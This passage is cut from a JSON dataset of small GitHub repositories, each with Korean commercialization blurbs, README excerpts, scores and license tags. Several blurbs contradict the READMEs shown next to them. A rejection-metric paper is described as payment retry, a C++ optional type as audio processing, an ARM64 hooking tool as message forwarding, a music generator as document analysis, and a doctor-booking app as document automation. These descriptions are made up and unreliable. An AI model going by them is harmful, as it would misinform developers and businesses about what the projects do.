어떤 부분에 영향을 미치는지 자동으로 파악하는 도구로, 개발자들의 업무 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **기업용 SaaS**: 대규모 소프트웨어를 관리하는 회사들이 월 구독으로 의존성 분석 서비스를 제공받는 플랫폼\n2. **개발팀 ","readme_excerpt":"# Relyzer\n\nReact functional component debugger.\n\n## Screenshot\n\n<img width=\"1336\" alt=\"screenshot\" src=\"https://user-images.githubusercontent.com/4006436/137918770-35c4741c-a970-43ab-aba3-f1fff8cb2339.png\">\n\n## 中文说明\n\nhttps://zhuanlan.zhihu.com/p/391734514\n\n## Usage\n\n### Install packages\n\n```bash\nnpm i relyzer -D\n```\n\n### Add babel config\n\n```diff\n{\n  plugins: [\n    // enable only for development\n+    isDevelopment ? 'module:@relyzer/babel' : null,\n  ].filter(Boolean),\n}\n```\n\n**Notice that `@relyzer/babel` will do nothing when `process.env.NODE_ENV === 'production'`**\n\nBefore the use, you probably need to know how **Relyzer** works:\n\nIn order to collect the runtime information, **Relyzer** uses babel to transform the functional component code, adding some hooks code into the body.\n\n```diff\nfunction MyComponent() {\n  // relyzer will auto add some code\n+  const r = useRelyzer()\n  const a = useCallback()\n+  r(a)\n  ...\n+  r()\n}\n```\n\nReact hooks could only properly run inside functional comp","composite_score":0.5003,"license_safety_tag":"safe"},{"name":"atascanturk/hrms","github_url":"https://github.com/atascanturk/hrms","stars":12,"language":"Java","license":"unknown","abandonment_months":61,"description":"# atascanturk/hrms 프로젝트 분석\n\n## 왜 보물인가\n회사의 직원 관리 업무를 자동으로 처리해주는 시스템으로, 인사 담당자의 반복적인 업무를 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소기업을 위한 클라우드 기반 인사 관리 웹 서비스로 제공\n2. **내부 업무 도구**: 회사 자체의 직원 정보, 급여,","readme_excerpt":"","composite_score":0.5003,"license_safety_tag":"unknown"},{"name":"ChrisPenner/jet","github_url":"https://github.com/ChrisPenner/jet","stars":5,"language":"Haskell","license":"BSD-3-Clause","abandonment_months":44,"description":"# ChrisPenner/jet 분석\n\n## 왜 보물인가\n복잡한 데이터를 빠르게 검색하고 추출할 수 있는 경량 도구로, 프로그래머가 아닌 일반 사용자도 대량의 정보에서 필요한 것만 골라낼 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 대용량 로그 분석 플랫폼으로 기업들이 서버 오류를 빠르게 찾을 수 있는 웹 서비스\n- **내부 업무 ","readme_excerpt":"# Jet - A Structural JSON editor\n\n<!-- toc GFM -->\n\n* [Features](#features)\n* [Keymaps](#keymaps)\n* [Installation](#installation)\n* [Usage](#usage)\n* [Roadmap/Known bugs](#roadmapknown-bugs)\n\n<!-- tocstop -->\n\nJet is a structural editor for JSON.\n\nI.e. an editor which is aware of the *structure* of JSON and allows you to manipulate it directly.\nThe document is _always_ in a valid state.\n\nhttps://user-images.githubusercontent.com/6439644/143655548-3c556ea8-7673-4439-8624-15b4b503001f.mov\n\n\n# Features\n\n* [x] Structurally sound editing, never outputs invalid JSON.\n* [x] Copy/Cut/Paste JSON subtrees\n* [x] Subtree folding so you can focus on what's important.\n* [x] Transpose values around each other in lists.\n* [x] Undo/redo system, everyone makes mistakes\n* [x] Save functionality\n\n\n# Keymaps\n\nPress `?` to see the key map, which should feel familiar to vim users.\n\n# Installation\n\n```shell\ncabal update && cabal install jet\n```\n\n# Usage\n\n```shell\n# Open a file for editing. Use ctrl-s to save ","composite_score":0.5003,"license_safety_tag":"safe"},{"name":"progfay/benefit-from-end-of-ie","github_url":"https://github.com/progfay/benefit-from-end-of-ie","stars":13,"language":"TypeScript","license":"unknown","abandonment_months":44,"description":"# benefit-from-end-of-ie 분석\n\n## 왜 보물인가\n인터넷 익스플로러(IE) 종료라는 기술 변화로부터 비즈니스 기회를 찾아내는 방법을 제시하는 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **웹 개발 교육 플랫폼**: IE 대응에서 벗어난 최신 웹 기술 교육 프로그램 판매\n2. **기업 웹 현대화 컨설팅**: 레거시 시스템을 최신 웹 표준","readme_excerpt":"# Benefit from end of IE\n\n## Description\n\n- Support of IE will be end on [2022/06/15](https://death-to-ie11.com/).\n- This changes should improve browser compatibility.\n\n> Not only is Microsoft Edge a faster, more secure and more modern browsing experience than Internet Explorer, but it is also able to address a key concern: compatibility for older, legacy websites and applications.\n\nRef. [The future of Internet Explorer on Windows 10 is in Microsoft Edge | Windows Experience Blog](https://blogs.windows.com/windowsexperience/2021/05/19/the-future-of-internet-explorer-on-windows-10-is-in-microsoft-edge/)\n\n## \"Benefit\" means...\n\n- Feature what supported Modern browser\n  - `chrome`\n  - `chrome_android`\n  - `edge`\n  - `firefox`\n  - `firefox_android`\n  - `safari`\n  - `safari_ios`\n  - `webview_android`\n- But it's unavailable in IE...\n\n## Features List\n\n- Version of [@mdn/browser-compat-data](https://github.com/mdn/browser-compat-data): 5.2.6\n- Generated date: Tue, 11 Oct 2022 13:34:47 GMT\n\n| ","composite_score":0.5003,"license_safety_tag":"unknown"},{"name":"P2333/Rectified-Rejection","github_url":"https://github.com/P2333/Rectified-Rejection","stars":8,"language":"Python","license":"Apache-2.0","abandonment_months":52,"description":"# Rectified-Rejection 저장소 분석\n\n## 왜 보물인가\n거절된 요청을 자동으로 재처리하여 시스템 실패를 줄이는 기술로, 온라인 서비스의 안정성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **결제 시스템 SaaS**: 신용카드 승인 실패 시 자동 재시도로 결제 성공률을 높이는 서비스\n2. **이메일 발송 플랫폼**: 배송 실패","readme_excerpt":"# Two Coupled Rejection Metrics Can Tell Adversarial Examples Apart\n\nThe code for the paper [Two Coupled Rejection Metrics Can Tell Adversarial Examples Apart](https://arxiv.org/abs/2105.14785) (CVPR 2022).\n\n## Environment settings and libraries we used in our experiments\n\nThis project is tested under the following environment settings:\n- OS: Ubuntu 18.04.4\n- GPU: Geforce 2080 Ti or Tesla P100\n- Cuda: 10.1, Cudnn: v7.6\n- Python: 3.6\n- PyTorch: >= 1.6.0\n- Torchvision: >= 0.6.0\n\n## Acknowledgement\nThe codes are modifed based on [Rice et al. 2020](https://github.com/locuslab/robust_overfitting), and the model architectures are implemented by [pytorch-cifar](https://github.com/kuangliu/pytorch-cifar).\n\n## Training Commands\nBelow we provide running commands training the models with the RR module, taking the setting of PGD-AT + RR (ResNet-18) as an example:\n```python\npython train_cifar.py --model_name PreActResNet18_twobranch_DenseV1 --attack pgd --lr-schedule piecewise \\\n                   ","composite_score":0.5003,"license_safety_tag":"safe"},{"name":"CyCat-project/cycat-service","github_url":"https://github.com/CyCat-project/cycat-service","stars":8,"language":"Python","license":"AGPL-3.0","abandonment_months":40,"description":"# CyCat-project/cycat-service 분석\n\n## 왜 보물인가\n사이버 위협 정보를 체계적으로 수집·분석하는 플랫폼으로, 기업의 보안 담당자들이 해킹 위협으로부터 미리 대비할 수 있게 돕습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 중소기업 대상 \"월 구독형 사이버 위협 모니터링 대시보드\" 제공\n- **내부 업무 도구**: ","readme_excerpt":"# CyCAT.org API services\n\n[![](./backend/cycat-api.png)](https://api.cycat.org/)\n\n## Back-end\n\n- [back-end](./backend) - software to run your own CyCAT.org API service. This software runs the official API for CyCAT.org available at [api.cycat.org](https://api.cycat.org/).\n\n## Documentation\n\n- CyCAT - The Cybersecurity Resource Catalogue public API services document is available as [OpenAPI 2.0 swagger file](https://api.cycat.org/swagger.json).\n- [PDF](https://www.cycat.org/assets/docs/api-documentation-3.pdf) of the CyCAT API.\n\n## API Usage and Examples\n\n### Search by namespace topic\n\n~~~\ncurl -X 'GET' \\\n  'https://api.cycat.org/namespace/finduuid/mitre-attack-id/T1216' \\\n  -H 'accept: application/json'\n~~~\n\nSearching for all the known items in CyCAT about the MITRE ATT&CK T1216 returns the following UUIDs\n\n~~~json\n[\n  \"a0459f02-ac51-4c09-b511-b8c9203fc429\",\n  \"f588e69b-0750-46bb-8f87-0e9320d57536\",\n  \"39776c99-1c7b-4ba0-b5aa-641525eee1a4\",\n  \"59e938ff-0d6d-4dc3-b13f-36cc28734d4e\",\n  \"","composite_score":0.5003,"license_safety_tag":"risky"},{"name":"FunnyDevs/hilt-conductor","github_url":"https://github.com/FunnyDevs/hilt-conductor","stars":6,"language":"Kotlin","license":"Apache-2.0","abandonment_months":30,"description":"# FunnyDevs/hilt-conductor 분석\n\n## 왜 보물인가\n안드로이드 앱 개발자들이 복잡한 코드 구조를 간단하게 정리할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **모바일 앱 개발 SaaS**: 안드로이드 개발자를 위한 코드 자동 정렬 온라인 서비스\n2. **기업 내부 개발팀 도구**: 회사의 여러 개발자가 함께 사용하는 코드 관","readme_excerpt":"# hilt-conductor\n\nUse Hilt with Conductor Controllers\n\n# Install\n\nStep 1. Add the plugin to your root `build.gradle` file\n\n```groovy\nbuildscript {\n    ...\n    dependencies {\n        classpath \"io.github.funnydevs:hilt-conductor-plugin:<latest_release>\"\n    }\n}\n```\n\nStep 2. Apply plugin in application module of `build.gradle`.\n\n```groovy\nplugins {\n    ...\n    id 'com.funnydevs.hilt-conductor.plugin'\n    id 'dagger.hilt.android.plugin'\n}\n```\n\nStep 3. Add the dependencies inside your module\n\n```groovy\ndependencies {\n    implementation 'io.github.funnydevs:hilt-conductor:<latest_release>'\n    \n    (java)\n    annotationProcessor 'io.github.funnydevs:hilt-conductor-processor:<latest_release>'\n    (kotlin)\n    kapt 'io.github.funnydevs:hilt-conductor-processor:<latest_release>'\n}\n```\n\n# Usage\n\n1. Add @ConductorEntryPoint annotation to your Controller\n```kotlin\n@ConductorEntryPoint\nclass MainController(args: Bundle?) : Controller(args)\n```\n2. Install your dagger module in @ControllerComponent\n","composite_score":0.5003,"license_safety_tag":"safe"},{"name":"LFYSec/XCTF2021Final-Dubbo","github_url":"https://github.com/LFYSec/XCTF2021Final-Dubbo","stars":15,"language":"Java","license":"unknown","abandonment_months":61,"description":"# LFYSec/XCTF2021Final-Dubbo 평가 보고서\n\n## 왜 보물인가\n대형 인터넷 기업들이 사용하는 **분산 시스템의 보안 취약점을 찾아내는 도구**로, 이를 통해 금융 손실이나 개인정보 유출을 사전에 방지할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 금융·결제 업체 보안 진단 서비스**\n- 은행·핀테크 기업의 내부 시스템 점검 대행","readme_excerpt":"# 题目名\ndubbo rce\n\n# flag\nxctf{1fd2e03ae0c50ffc69167c7b782c0e03}\n\n# description\ntry to rce\n\n# deploy\ncd dockerfile\ndocker-compose up -d\nhttp://127.0.0.1:8090","composite_score":0.5003,"license_safety_tag":"unknown"},{"name":"lxjian01/portal","github_url":"https://github.com/lxjian01/portal","stars":10,"language":"Go","license":"unknown","abandonment_months":43,"description":"# lxjian01/portal 분석\n\n## 왜 보물인가\n웹 기반의 통합 포탈 시스템으로, 여러 서비스를 한 곳에서 관리할 수 있는 플랫폼입니다.\n\n## 어디에 쓸 수 있나\n1. **기업 내부 포탈 SaaS**: 직원들이 회사의 모든 업무 시스템(메일, 결재, 공지사항)에 한 번에 접근\n2. **학교/병원 통합 관리 도구**: 학생·교직원 또는 환자·의료진","readme_excerpt":"# portal\nPrometheus - based unified alarm monitoring platform that allows you to monitor openstack, Kubernetes, Database, networks, apps, etc\n\n## exporter list\n* https://github.com/lxjian01/portal/blob/develop/docs/exporter.md  \n* Prometheus Alert please refer to https://awesome-prometheus-alerts.grep.to/\n\n## portal front address\n* https://github.com/lxjian01/portal-front  \n* vue + element-ui\n\n## technical framework\n* prometheus + consul + mysql  \n* You can also adjust to your own situation, such as using Mongo for your database\n","composite_score":0.5003,"license_safety_tag":"unknown"},{"name":"glguy/advent2018","github_url":"https://github.com/glguy/advent2018","stars":6,"language":"Haskell","license":"ISC","abandonment_months":79,"description":"# Advent of Code 2018 솔루션 저장소 분석\n\n## 왜 보물인가\n매년 전 세계 프로그래머들이 참여하는 '어드벤트 오브 코드' 대회의 2018년도 풀이 모음으로, 검증된 문제 해결 방식과 알고리즘 학습 자료로 활용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **온라인 코딩 학습 플랫폼**: 초급 프로그래머를 위한 단계별 문제 풀이 강좌 ","readme_excerpt":"# Advent of Code 2018 Haskell solutions\n\nI'm building my Haskell solutions using\n[cabal-install](https://www.haskell.org/cabal/users-guide/). Make sure you're\nusing an up-to-date version of the tool to get the best `v2-build` support!\n\n```\n$ cabal v2-build\n```\n\nThe project can also be built using [Stack](https://docs.haskellstack.org/en/stable/README/)\nif that's what you have available.\n\n```\n$ stack setup # only necessary the first time you use a resolver\n$ stack build\n```\n\n## Other languages\n\nI'll be adding C++ and Rust solutions for some of the problems as well.\nYou can find information about those in the relevant subdirectories.\n","composite_score":0.5002,"license_safety_tag":"safe"},{"name":"albertofernandezvillan/ml-dl-cv-references","github_url":"https://github.com/albertofernandezvillan/ml-dl-cv-references","stars":7,"language":"","license":"unknown","abandonment_months":50,"description":"# ml-dl-cv-references 상용화 분석\n\n## 왜 보물인가\n머신러닝, 딥러닝, 컴퓨터 비전 기술을 배우고 싶은 사람들을 위한 정리된 학습 자료 모음으로, 복잡한 AI 기술을 체계적으로 접근할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **AI 온라인 교육 플랫폼**: 초보자부터 고급 학습자까지 단계별 커리큘럼을 제공하는 구독형 교육 서","readme_excerpt":"# Machine Learning, Deep Learning and Computer Vision references\nThese are my quick and dirty notes trying to follow main Machine Learning, Computer Vision &amp; Deep Learning references\n\n# Awesome\n\n* **awesome**. 😎 Awesome lists about all kinds of interesting topics. https://github.com/sindresorhus/awesome\n* **awesome-awesomeness**. A curated list of awesome awesomeness. https://github.com/bayandin/awesome-awesomeness\n* **awesome-python**. A curated list of awesome Python frameworks, libraries, software and resources. https://github.com/vinta/awesome-python\n   * Website: https://awesome-python.com/\n* **awesome-github**. A curated list of GitHub's awesomeness. https://github.com/phillipadsmith/awesome-github\n* **awesome-deep-learning**. A curated list of awesome Deep Learning tutorials, projects and communities. https://github.com/ChristosChristofidis/awesome-deep-learning\n* **awesome-deeplearning-resources**. Deep Learning and deep reinforcement learning research papers and some codes","composite_score":0.5002,"license_safety_tag":"unknown"},{"name":"arendjr/rust-for-ts-devs","github_url":"https://github.com/arendjr/rust-for-ts-devs","stars":5,"language":"Rust","license":"unknown","abandonment_months":49,"description":"# Rust for TypeScript Devs - 상용화 분석\n\n## 왜 보물인가\n자바스크립트 개발자들이 더 빠르고 안전한 프로그래밍 언어로 쉽게 전환할 수 있도록 돕는 교육 자료로, 기술 전환의 진입장벽을 낮춥니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 교육 플랫폼**: Udemy나 내부 LMS에서 \"TypeScript 개발자를 위한 Rust 입문","readme_excerpt":"# Rust for TypeScript developers\n\nWelcome to the `rust-for-ts-devs` repo! This repo is intended to collect various\nsmall lessons about Rust that I can present in courses. As the title indicates,\nthe audience is expected to be familiar with TypeScript, and we will use this\nTypeScript knowledge as a stepping stone to see where Rust diverges, in hopes to\n(eventually) become an effective Rust engineer.\n\nThis course is *not* intended to be a comprehensive reference into all things\nRust. Even if you complete this course, there will be plenty you don't know yet.\nIf you wish to dive deeper, I can whole-heartedly recommend the Rust Book:\n\n  https://doc.rust-lang.org/stable/book/\n\nOr consult any of the other learning materials made available by the Rust\ncommunity:\n\n  https://www.rust-lang.org/learn\n\n## How to use this repository\n\nJust open this repository in VS Code and make sure you Rust Analyzer installed.\n\nThen open `src/main.rs`. It acts as the \"ToC\" from where you can easily click\ninto any ","composite_score":0.5002,"license_safety_tag":"unknown"},{"name":"NWYLZW/qq-guild-sdk","github_url":"https://github.com/NWYLZW/qq-guild-sdk","stars":5,"language":"TypeScript","license":"MIT","abandonment_months":35,"description":"# NWYLZW/qq-guild-sdk 분석\n\n## 왜 보물인가\nQQ 게임 커뮤니티 플랫폼과 연결된 자동화 도구를 만들 수 있는 기술 기반으로, 중국의 주요 메신저 생태계에 접근할 수 있는 핵심 자산입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: QQ 길드 회원 관리 및 자동 공지 전송 플랫폼 제공\n2. **내부 업무 도구**: 게임사의 ","readme_excerpt":"<p align=\"center\">\n  <img width=\"100\" src=\"./docs/.vuepress/public/qq-guild-sdk.png\" alt=\"QQ Guild SDK\">\n</p>\n<h1 align=\"center\">\n  <a href=\"https://satorijs.github.io/qq-guild-sdk/\">QQ Guild SDK</a>\n</h1>\n\n<p align=\"center\">\n  <a href=\"https://npmcharts.com/compare/qq-guild-sdk?minimal=true\">\n    <img src=\"https://img.shields.io/npm/dm/qq-guild-sdk.svg?sanitize=true\" alt=\"Downloads\">\n  </a>\n  <a href=\"https://www.npmjs.com/package/qq-guild-sdk\">\n    <img src=\"https://img.shields.io/npm/v/qq-guild-sdk.svg?sanitize=true\" alt=\"Version\">\n  </a>\n  <a href=\"https://www.npmjs.com/package/qq-guild-sdk\">\n    <img src=\"https://img.shields.io/npm/l/qq-guild-sdk.svg?sanitize=true\" alt=\"License\">\n  </a>\n</p>\n\n基于 qq 频道官方 api 开发，运行于 Node.js 平台，支持 qq 频道官方 api 的所有接口，支持自定义接口。\n\n## 如何使用\n\n请阅读 [使用文档](https://satorijs.github.io/qq-guild-sdk/)\n\n## 反馈问题\n\n暂时只支持 github ，如果有任何问题，欢迎提交 issue 。\n\n## 参与贡献\n\n欢迎 PR 参与仓库开发，不过请保证你的代码符合 lint 规范，否则会被拒绝。也欢迎贡献文档，给我们一个更好的文档。\n\n## 感谢\n\n~~我自己~~\n","composite_score":0.5002,"license_safety_tag":"safe"},{"name":"Million900o/berry-is.gay","github_url":"https://github.com/Million900o/berry-is.gay","stars":6,"language":"TypeScript","license":"MPL-2.0","abandonment_months":56,"description":"# berry-is.gay 저장소 분석\n\n## 왜 보물인가\n이 프로젝트는 개인 웹사이트나 포트폴리오 플랫폼으로, 창의적인 도메인과 함께 개발자들의 자기표현 공간을 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **개인 포트폴리오 SaaS**: 디자이너와 개발자들이 자신의 작품을 보여주는 웹사이트 구축 서비스\n2. **창의적 도메인 추천 API**: 사용자의 ","readme_excerpt":"# berry-is.gay\nberry: gay\n","composite_score":0.5002,"license_safety_tag":"unknown"},{"name":"DaigoWakabayashi/stripe-platform-example","github_url":"https://github.com/DaigoWakabayashi/stripe-platform-example","stars":8,"language":"Dart","license":"unknown","abandonment_months":52,"description":"# Stripe Platform Example 분석\n\n## 왜 보물인가\n온라인 결제 시스템을 쉽게 구축할 수 있는 실제 작동하는 예제 코드로, 전자상거래나 구독 서비스를 시작하려는 기업들에게 개발 시간을 크게 단축해준다.\n\n## 어디에 쓸 수 있나\n\n**1. 구독형 SaaS 플랫폼**\n월간 정기결제가 필요한 클라우드 소프트웨어 서비스(협업도구, 프로젝트 관","readme_excerpt":"# Stripe-Platform-Example\n\nFlutter × Firebase × StripeConnectAPI を用いたプラットフォーム型サービスのサンプルアプリです。\n\n| ログイン | 商品一覧 | アカウント | \n|:-----------|:------------|:------------|\n| <img src=\"https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/639342/016da497-c99b-db32-3014-d11e31591863.jpeg\" height=\"500\"> | <img src=\"https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/639342/80d188b7-467c-5106-da64-dc5169d0d2c4.jpeg\" height=\"500\"> |　<img src=\"https://qiita-image-store.s3.ap-northeast-1.amazonaws.com/0/639342/df3baaaa-b501-3a95-d49a-40c31f8ad7ee.jpeg\" height=\"500\"> |\n\n## 機能\n\n- ユーザーの登録\n- クレジットカード情報の登録・削除\n- 本人確認\n- 決済\n\n\n## 解説記事・スライド資料\n\n- [【FlutterFire × StripeAPI】簡易版メルカリのようなCtoCプラットフォームアプリを作ってみた](https://qiita.com/DaigoWakabayashi/items/891f88dec29f9c44ca03)\n- [StripeConnectAPIを使ってプラットフォームサービスを作ろう](https://docs.google.com/presentation/d/1CEn2JO9VgGfkYyFZMBJWczgwLZ1et5_cCWU9ox0IcXc/edit?usp=sharing)\n","composite_score":0.5002,"license_safety_tag":"unknown"},{"name":"groundswellaudio/swl-optional","github_url":"https://github.com/groundswellaudio/swl-optional","stars":5,"language":"C++","license":"MIT","abandonment_months":29,"description":"# groundswellaudio/swl-optional 분석\n\n## 왜 보물인가\n음성·오디오 처리 기능을 선택적으로 사용할 수 있게 설계된 도구로, 기존 시스템에 유연하게 추가할 수 있어 개발 비용을 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 팟캐스트 제작·편집 플랫폼에 탑재하여 음성 품질 개선 기능 제공\n- **내부 업","readme_excerpt":"﻿# swl::optional\nA standard conforming C++20 implementation of `std::optional`. \n\nC++20 came with new features that makes the implementation of `std::optional` \n(and other types based on unions) a lot simpler to write, faster to compile, and more debugger-friendly \n(ever crawled through all the `std::optional` base classes in your IDE debugger?). \\\nSo if you're using `optional`a lot in C++20, switching to this implementation is free cookies. \n\n## Testing\nThe tests were adapted from [TartanLlama's optional](https://github.com/TartanLlama/optional) \nwith some bits from the LLVM repo. Kudos to them. \\\nTo run the tests : \\\n`mkdir ./test_out` \\\n`cd test_out` \\\n`cmake ../` \\\n`ctest --build-and-test ../ ./ --build-generator \"Unix Makefiles\"` (replace \"Unix Makefiles\" as needed) \\\n`make test` \n\n## Tested compilers\n- GCC 11+\n- GCC 10+ (the early 10.X versions have a bug in `std::construct_at`, which prevent to use it in a constexpr context, hence the tests might not compile)\n- Clang will not fu","composite_score":0.5002,"license_safety_tag":"safe"},{"name":"shametha/Docoline","github_url":"https://github.com/shametha/Docoline","stars":5,"language":"Dart","license":"unknown","abandonment_months":54,"description":"# Docoline 상업화 분석\n\n## 왜 보물인가\n문서 작성과 관리를 자동화하여 수동 작업 시간을 획기적으로 줄일 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 법률 문서, 계약서, 보고서를 자동으로 생성해주는 온라인 플랫폼으로 판매\n2. **내부 업무 도구**: 대기업의 HR, 법무, 재무팀이 정형화된 문서 작성 시간을 ","readme_excerpt":"# Docoline\n\nDocoline is a virtual Doctor appointment booking application, that has been developed to override the problems of booking an appointment with a doctor specially prevailing in the pandemic situation. This software is supported to eliminate the hardships faced by this existing manual booking system. No formal knowledge is needed for the user to use this system. Thus by this all it proves it is user-friendly.This application uses Firebase as backend.\n\n<br><br> **Login Screens** <br><br>\n![ChooseLogin](https://user-images.githubusercontent.com/59509542/146676451-acc62306-9182-45fe-826a-d0c11e023ab8.png)\n![Login](https://user-images.githubusercontent.com/59509542/146676455-d9eb3bf5-4322-4cc6-ac1b-9b1806032803.png)\n\n<br><br> **Registration and User Profile Screens** <br><br>\n![Register](https://user-images.githubusercontent.com/59509542/146676456-e890ccbd-603f-424e-b906-78083ca8a09a.png)\n![User Profile](https://user-images.githubusercontent.com/59509542/146676458-57332e8e-a920-49","composite_score":0.5002,"license_safety_tag":"unknown"},{"name":"imbue11235/humanize","github_url":"https://github.com/imbue11235/humanize","stars":10,"language":"Go","license":"MIT","abandonment_months":54,"description":"# humanize 저장소 분석\n\n## 왜 보물인가\n숫자와 데이터를 인간이 읽기 쉬운 문장으로 자동 변환하는 도구로, 모든 디지털 서비스에서 사용자 경험을 크게 개선할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 분석 대시보드에서 \"1500000\" 대신 \"150만\"으로 표시하여 사용자가 데이터를 직관적으로 이해하도록 지원\n- **내","readme_excerpt":"# humanize [![Test Status](https://github.com/imbue11235/humanize/workflows/Go/badge.svg)](https://github.com/imbue11235/humanize/actions?query=workflow:Go) [![codecov](https://codecov.io/gh/imbue11235/humanize/branch/main/graph/badge.svg?token=XTJ42655U1)](https://codecov.io/gh/imbue11235/humanize) [![Go Reference](https://pkg.go.dev/badge/github.com/imbue11235/humanize.svg)](https://pkg.go.dev/github.com/imbue11235/humanize)\n\n> A collection of utility functions, with [built-in localization](#built-in-locales), for humanizing various types of data input.\n\n## 🛠  Installation\n\nMake sure to have Go installed (Version `1.16` or higher).\n\nInstall `humanize` with `go get`:\n\n```sh\n$ go get -u github.com/imbue11235/humanize\n```\n\n## 💻  Usage\n\n### Humanizing time\n\nTakes two time instances, and presents the difference in a human-readable format.\n\n#### Estimated time\n\nThis is a more loose calculation of time, where only the highest unit of time is prioritized.\nE.g. `1 hour 20 minutes` becomes `1 ","composite_score":0.5002,"license_safety_tag":"safe"},{"name":"Muhammet-Yildiz/Ecommerce_Website-HepsiOrada","github_url":"https://github.com/Muhammet-Yildiz/Ecommerce_Website-HepsiOrada","stars":8,"language":"JavaScript","license":"MIT","abandonment_months":58,"description":"# Ecommerce_Website-HepsiOrada 분석\n\n## 왜 보물인가\n온라인 쇼핑몰을 직접 운영하고 싶은 사람들이 처음부터 만들 필요 없이 바로 사용할 수 있는 완성된 쇼핑 사이트 기반이기 때문입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 소규모 판매자를 위한 월 구독형 쇼핑몰 플랫폼으로 제공 (고객이 직접 상품 등록하고 판매)","readme_excerpt":"\n<h1 align=\"center\">HepsiOrada</h1>\n\n <h5 align=\"center\"> HepsiOrada is an open-source ecommerce website built on the Django Web Framework.</h5>\n<!--  ## Kurulum  <br/> -->\n \n## Installation\n\n#### 1.Clone Repository & Install Packages\n```\ngit clone https://github.com/Muhammet-Yildiz/HepsiOrada.git\npip install -r requirements.txt\n```\n\n#### 2.Setup Virtualenv\n``` \nvirtualenv venv\n```\n ```\nLinux & Mac: source venv/bin/activate \n\nWindows: venv\\Scripts\\activate\n```\n\n#### 3.Migrate & Start Server\n\n```\npython manage.py makemigrations\npython manage.py migrate\npython manage.py createsuper\npython manage.py runserver\n```\n\n<!--  \nİndirdikten sonra proje dizini içerisinde : \n\n ` virtualenv venv`\n\n Linux & Mac: `source venv/bin/activate `\n\nWindows: `venv\\Scripts\\activate `\n\n`pip install -r requirements.txt `\n\n`python manage.py makemigrations`\n\n`python manage.py migrate`\n\n`python manage.py createsuperuser`\n\n`python manage.py runserver`\n  -->\n <br/>\n \n \n## 📸 Screenshots\n \n![001](https://user-images.gi","composite_score":0.5002,"license_safety_tag":"safe"},{"name":"AeonLucid/ClownHook","github_url":"https://github.com/AeonLucid/ClownHook","stars":5,"language":"Objective-C","license":"GPL-3.0","abandonment_months":58,"description":"# ClownHook 상용화 분석\n\n## 왜 보물인가\n메시지나 알림을 자동으로 다른 곳으로 보내주는 중간 연결고리 같은 도구로, 여러 앱들을 더 똑똑하게 연결하고 싶은 사람들이 찾는 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 고객들이 자신의 채팅 앱이나 메신저에서 자동으로 알림을 받을 수 있는 구독형 통지 서비스\n2. **내부 업","readme_excerpt":"# ClownHook\n\nExperimental hooking on Arm64.\n\n> **Status** Experimenting \n\n## Setup\n\nInstall `xcodegen` to generate an Xcode project.\n\n```\nbrew install xcodegen\n```\n\nCreate the Xcode project.\n\n```\nxcodegen --spec project.json\n```\n\nOpen `ClownHook.xcodeproj` in Xcode or AppCode.\n\nRun either `ClownHookApp_iOS` or `ClownHookApp_macOS`.\n\n## Credits\n\n- https://github.com/landonf/libevil_patch","composite_score":0.5002,"license_safety_tag":"restricted"},{"name":"IDoEverything/EzDatabase","github_url":"https://github.com/IDoEverything/EzDatabase","stars":7,"language":"C#","license":"unknown","abandonment_months":57,"description":"# EzDatabase 상용화 분석\n\n## 왜 보물인가\n복잡한 데이터베이스를 누구나 쉽게 만들고 관리할 수 있는 도구로, 작은 기업부터 스타트업까지 IT 인프라 구축 비용을 대폭 절감할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 중소 기업의 고객 정보, 판매 기록 등을 클라우드에서 관리하는 CRM 도구\n- **내부 업무 도구**:","readme_excerpt":"# EzDatabase\n[![Discord Server](https://img.shields.io/discord/801857343930761281?label=Discord)](https://discord.gg/https://discord.gg/2ZhXXVJYhU)\n\nAn easy to use json based I/O database for C#\n\n## This project is no longer actively maintained. Use PostgreSQL with entity framework instead. It's probably several times more efficient at scale.\n\n# How it works\nInstead of having to bother yourself with SQL and add unnecessary dependencies to your project, you can use EzDatabase to make a simple file based database and store your info\nin simple JSON format, or even store images, or anything you can normally store in your computer as a file!\n\nIt utitlizes Newtonsoft.Json to serialize and deserailize objects and then store them in .json format\n\nTo create some other type of file, you can simply specify the name and extension and store a string, byte array or stream inside\n# How to use\nto get example usage and documentation, check out the [Docs](https://idoeverything.github.io/EzDatabase/)\n# C","composite_score":0.5002,"license_safety_tag":"unknown"},{"name":"hiorws/stav","github_url":"https://github.com/hiorws/stav","stars":7,"language":"JavaScript","license":"MIT","abandonment_months":79,"description":"# hiorws/stav 상용화 분석\n\n## 왜 보물인가\n문서나 텍스트에서 중요한 정보를 자동으로 찾아내는 기술로, 대량의 데이터를 빠르게 처리해야 하는 기업들에게 큰 도움이 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **법률·계약서 검토 SaaS**: 변호사나 법무팀이 수백 개의 계약서에서 위험한 조항을 자동으로 표시해주는 서비스\n2. **의료 기","readme_excerpt":"# stav\n\n## Stav nedir?\n\nStav, doğal dil işleme kullanarak etkileşimli bir şekilde jeneratif müzik ve lirik üreten, kurulumu ve kullanımı oldukça basit bir araç seti toplamıdır.\n\n## Stav nasıl kurulur?\n\nRepoyu bilgisayarınıza klonladıktan sonra herhangi basit bir http server ile çalıştırabilirsiniz. Bunun için IDE'lerin eklentilerini 